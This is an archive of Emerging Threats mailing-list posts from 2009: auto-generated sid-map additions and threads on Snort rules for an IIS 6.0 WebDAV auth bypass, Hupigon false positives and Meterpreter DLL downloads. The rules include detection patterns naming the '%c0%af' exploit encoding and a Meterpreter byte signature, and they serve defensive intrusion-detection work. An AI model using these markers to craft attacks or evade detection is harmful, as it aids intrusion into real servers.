        2500108 || ET COMPROMISED Known Compromised or Hostile Host Traffic (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500109 || ET COMPROMISED Known Compromised or Hostile Host Traffic (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500110 || ET COMPROMISED Known Compromised or Hostile Host Traffic (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500111 || ET COMPROMISED Known Compromised or Hostile Host Traffic (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500112 || ET COMPROMISED Known Compromised or Hostile Host Traffic (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500113 || ET COMPROMISED Known Compromised or Hostile Host Traffic (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500114 || ET COMPROMISED Known Compromised or Hostile Host Traffic (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500115 || ET COMPROMISED Known Compromised or Hostile Host Traffic (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500116 || ET COMPROMISED Known Compromised or Hostile Host Traffic (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500117 || ET COMPROMISED Known Compromised or Hostile Host Traffic (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500118 || ET COMPROMISED Known Compromised or Hostile Host Traffic (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500119 || ET COMPROMISED Known Compromised or Hostile Host Traffic (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500120 || ET COMPROMISED Known Compromised or Hostile Host Traffic (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500121 || ET COMPROMISED Known Compromised or Hostile Host Traffic (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500122 || ET COMPROMISED Known Compromised or Hostile Host Traffic (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510082 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510083 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510084 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510085 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510086 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510087 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510088 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510089 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510090 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510091 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510092 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510093 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510094 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510095 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510096 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510097 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510098 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510099 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510100 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510101 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510102 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510103 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510104 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510105 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510106 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510107 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510108 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510109 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510110 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510111 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510112 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510113 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510114 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510115 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510116 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510117 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510118 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510119 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510120 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510121 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510122 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From wolvee.x at gmail.com  Mon May 18 01:16:52 2009
From: wolvee.x at gmail.com (Wolvee)
Date: Mon, 18 May 2009 10:46:52 +0530
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <mailman.620.1242590712.464.emerging-sigs@emergingthreats.net>
References: <mailman.620.1242590712.464.emerging-sigs@emergingthreats.net>
Message-ID: <4A10EF44.6060301@gmail.com>

Hi All,

Can some one please tell me about flowbits keyword in the rule and what
is the performance if we use it in the rule??
>
> That's a good idea.  However, I think there may be a need for some to
> see alerts on attempts.  So, adding a flowbits in the first rule is good
> as long as the "noalert" is excluded.  Then a second rule for HTTP 200
> and check the first flowbit, with increased priority.
>
> PS: perhaps having a generic flowbits rules for common HTTP status codes
> maybe useful, to avoid redundant rules which rely on responses.  This
> probably depends on what's currently in the ruleset, I haven't checked.
> -  
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
>
> On Sun, 2009-05-17 at 06:28 -0700, Darren Spruell wrote:
>
>   
>> Would it work the way I think to flowbit the request (with the
>> submitted rule) and look for a 200 status code in the response to flag
>> successful exploitation? I'd expect a failure would result in
>> something like a 40x (unauthorized, not found) or other error code.
>>
>> DS
>>
>> On Sat, May 16, 2009 at 9:55 PM, dxp <dxp2532 at gmail.com> wrote:
>>     
>>> The text by Kingcope on milw0rm does specify the "translage: f" header in
>>> the first two examples.  I have not tested this but it appears, if I read
>>> the advisory correctly, that this additional header is required to exploit
>>> the vulnerability.  Without it the signature would pick up on many different
>>> web scans and woulld not be specific to this vulnerability.
>>>
>>> -
>>>
>>> -=[ dxp ]=-
>>> 0xA3F3C6E3
>>>
>>>
>>>
>>> On Sat, 2009-05-16 at 17:13 -0400, Nick Randolph wrote:
>>>
>>> I'm submitting this for the recent IIS 6.0 vulnerability
>>> http://isc.sans.org/diary.html?storyid=6397
>>>
>>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>>> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
>>> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
>>> sid:xxxxxx; gid:1; rev:1;)
>>>
>>> I also read that "translate: f" was required but the information on
>>> milw0rm.com did not use that in all 3 examples.
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>>       
Thanks,
Wolvee.

From mcholste at gmail.com  Mon May 18 10:35:18 2009
From: mcholste at gmail.com (Martin Holste)
Date: Mon, 18 May 2009 09:35:18 -0500
Subject: [Emerging-Sigs] Hupigon falses with Google search bot on sids
	2009290 and 2009292
Message-ID: <df9074860905180735o1ef139fcpab405dc74d0d7924@mail.gmail.com>

A Google search bot is triggering 2009290 and 2009292 on a fairly regular
basis for some of the pages we host.  It looks like this consists of a
connection with dsize < 28 to set the first flowbit followed by a dsize < 6,
which is apparently general enough to trigger many of these every day.  The
packets Snort logs for these hits have no data payload, which satisfies the
dsize < 28 and dsize < 6 requirements.  Can this be refined at all to avoid
these falses?

Thanks,

Martin
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/0e9ddecd/attachment.html

From mcholste at gmail.com  Mon May 18 10:46:13 2009
From: mcholste at gmail.com (Martin Holste)
Date: Mon, 18 May 2009 09:46:13 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
Message-ID: <df9074860905180746h3cfe2590h34e99a9557b9201d@mail.gmail.com>

Thanks for submitting that!  My question is whether the normalization of the
HTTP preproc will affect what data is passed to the content engine for
inspection.  Has anyone verified this rule detects a successful (or
unsuccessful) exploit?

Thanks,

Martin

On Sat, May 16, 2009 at 4:13 PM, Nick Randolph <randolphdavidn at gmail.com>wrote:

> I'm submitting this for the recent IIS 6.0 vulnerability
> http://isc.sans.org/diary.html?storyid=6397
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> sid:xxxxxx; gid:1; rev:1;)
>
> I also read that "translate: f" was required but the information on
> milw0rm.com did not use that in all 3 examples.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/7fa01d60/attachment.html

From randolphdavidn at gmail.com  Mon May 18 11:11:39 2009
From: randolphdavidn at gmail.com (Nick Randolph)
Date: Mon, 18 May 2009 11:11:39 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <df9074860905180746h3cfe2590h34e99a9557b9201d@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<df9074860905180746h3cfe2590h34e99a9557b9201d@mail.gmail.com>
Message-ID: <d48bb4250905180811p647b50f0r4f54135a4d506c5f@mail.gmail.com>

It looks like it does affect it.
The sig below will detect the "%c0%af" in the URL. The problem is it
will detect it anywhere else as well. I guess to help cut down on
false positives you could change the $HOME_NET to $HTTP_SERVERS if you
have that defined for your environment.

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
Auth Bypass"; flow:established,to_server; content:"|25|c0|25|af";
nocase; reference:url,isc.sans.org/diary.html?storyid-6397;
sid:xxxxxx; gid:1; rev:2;)

On Mon, May 18, 2009 at 10:46 AM, Martin Holste <mcholste at gmail.com> wrote:
> Thanks for submitting that!? My question is whether the normalization of the
> HTTP preproc will affect what data is passed to the content engine for
> inspection.? Has anyone verified this rule detects a successful (or
> unsuccessful) exploit?
>
> Thanks,
>
> Martin
>
> On Sat, May 16, 2009 at 4:13 PM, Nick Randolph <randolphdavidn at gmail.com>
> wrote:
>>
>> I'm submitting this for the recent IIS 6.0 vulnerability
>> http://isc.sans.org/diary.html?storyid=6397
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
>> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
>> sid:xxxxxx; gid:1; rev:1;)
>>
>> I also read that "translate: f" was required but the information on
>> milw0rm.com did not use that in all 3 examples.
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>

From spooker at gmail.com  Mon May 18 12:01:33 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Mon, 18 May 2009 13:01:33 -0300
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <d48bb4250905180811p647b50f0r4f54135a4d506c5f@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com> 
	<df9074860905180746h3cfe2590h34e99a9557b9201d@mail.gmail.com> 
	<d48bb4250905180811p647b50f0r4f54135a4d506c5f@mail.gmail.com>
Message-ID: <9255886c0905180901u6abd75abh945c5b281ea08278@mail.gmail.com>

Good post about it

http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html

Regards,

On Mon, May 18, 2009 at 12:11 PM, Nick Randolph <randolphdavidn at gmail.com>wrote:

> It looks like it does affect it.
> The sig below will detect the "%c0%af" in the URL. The problem is it
> will detect it anywhere else as well. I guess to help cut down on
> false positives you could change the $HOME_NET to $HTTP_SERVERS if you
> have that defined for your environment.
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass"; flow:established,to_server; content:"|25|c0|25|af";
> nocase; reference:url,isc.sans.org/diary.html?storyid-6397;
> sid:xxxxxx; gid:1; rev:2;)
>
> On Mon, May 18, 2009 at 10:46 AM, Martin Holste <mcholste at gmail.com>
> wrote:
> > Thanks for submitting that!  My question is whether the normalization of
> the
> > HTTP preproc will affect what data is passed to the content engine for
> > inspection.  Has anyone verified this rule detects a successful (or
> > unsuccessful) exploit?
> >
> > Thanks,
> >
> > Martin
> >
> > On Sat, May 16, 2009 at 4:13 PM, Nick Randolph <randolphdavidn at gmail.com
> >
> > wrote:
> >>
> >> I'm submitting this for the recent IIS 6.0 vulnerability
> >> http://isc.sans.org/diary.html?storyid=6397
> >>
> >> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> >> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> >> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> >> sid:xxxxxx; gid:1; rev:1;)
> >>
> >> I also read that "translate: f" was required but the information on
> >> milw0rm.com did not use that in all 3 examples.
> >> _______________________________________________
> >> Emerging-sigs mailing list
> >> Emerging-sigs at emergingthreats.net
> >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> >
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
===========================
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/616020bb/attachment.html

From emerging at emergingthreats.net  Mon May 18 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon, 18 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090518200010.DC2F44504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Mon May 18 16:00:10 2009 [***]

[*] Rules modifications: [*]
    None.

[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (26):
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500142 || ET COMPROMISED Known Compromised or Hostile Host Traffic (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500143 || ET COMPROMISED Known Compromised or Hostile Host Traffic (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510142 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510143 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (26):
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500142 || ET COMPROMISED Known Compromised or Hostile Host Traffic (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500143 || ET COMPROMISED Known Compromised or Hostile Host Traffic (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510142 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510143 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From ccentore at comcast.net  Mon May 18 16:41:07 2009
From: ccentore at comcast.net (ccentore@comcast.net)
Date: Mon, 18 May 2009 20:41:07 +0000 (UTC)
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
Message-ID: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>

This rule detects the transfer of the metsrv.dll file. It somewhat overlaps with rule 200419 / " ET POLICY PE EXE or DLL Windows file download", but I thought it might be a decent inclusion since, once downloaded, the metsrv.dll typically stays in memory and can be difficult to find if you don't know you are looking for it. 

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter metsrv.dll downloaded"; flow: established; content:"|DB 39 45 FC 0F 94 C0 89 45 FC D1 E9 85|"; classtype:xxxxx; reference:url,www.metasploit.com/documents/meterpreter.pdf; sid: xxxxx; rev:1;) 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/1346862e/attachment.html

From dxp2532 at gmail.com  Mon May 18 16:55:23 2009
From: dxp2532 at gmail.com (dxp)
Date: Mon, 18 May 2009 16:55:23 -0400
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>
References: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>
Message-ID: <1242680123.6901.11.camel@kinta>

It's a very good idea.  It's definitely worth knowing what was thrown at
you.
Have you tested this for False Positives?  What specifically those bytes
represent from the DLL?
